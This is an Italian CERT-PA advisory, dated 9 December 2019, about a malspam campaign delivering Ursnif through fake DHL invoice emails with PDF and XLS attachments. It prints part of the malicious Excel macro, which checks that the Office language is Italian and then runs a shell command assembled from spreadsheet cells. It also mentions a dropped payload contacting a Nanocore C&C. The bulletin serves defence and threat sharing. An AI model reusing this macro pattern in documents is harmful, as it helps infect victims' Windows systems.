Riparte la campagna Ursnif tramite false fatture DHL

09/12/2019

dhl malspam ursnif

In occasione delle imminenti festività natalizie, i cyber criminali tornano a veicolare Ursnif in Italia tramite email contenenti una falsa fattura DHL. La medesima tipologia di malspam è stata individuata ed analizzata dal CERT-PA in un apposito bollettino nel mese di giugno e successivamente riproposta nel mese di settembre 2019.

Le mail, indirizzate a enti pubblici e privati, presentano due allegati: un documento XLS e un documento di tipo PDF.

  1. 09122019_100348_1_001.pdf
  2. MIL0001772313.xls

Il PDF riporta il logo di DHL ed un testo nel quale viene sollecitato il pagamento per una fantomatica fattura non pagata, il file XLS è responsabile della catena di infezione.

Una volta aperto il documento XLS ed abilitate le macro, lo script malevolo provvede a compromettere il sistema Windows sul quale è stato lanciato. Ma prima di procedere con la compromissione esegue alcune verifiche per accertarsi che il target sia italiano.

Sub Formato()
jet = 15
If 1040 <> Finesta Then ActiveWorkbook.Close savechanges:=False
Dim p As Workbook
Shell hloop(True) & Cells(15, jet) & hloop(False)
ActiveWorkbook.Close savechanges:=False
Set p = Workbooks.Add
End Sub

Private Function Riga()
Riga = msoLanguageIDUI
End Function
Private Function Finesta()
Finesta = Application.LanguageSettings.LanguageID(Riga)
End Function

Accertatosi che il target sia corretto, esegue uno script powershell assemblato dai vari pezzi disposti su specifiche celle del foglio di calcolo.

In fine rilascia un file PE che da quanto si è potuto notare contatta un C&C già utilizzato da Nanocore Rat nelle campagne precedenti.

Indicatori di compromissione

  • IoC (.txt) – Hash, Domini, IP
  • IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr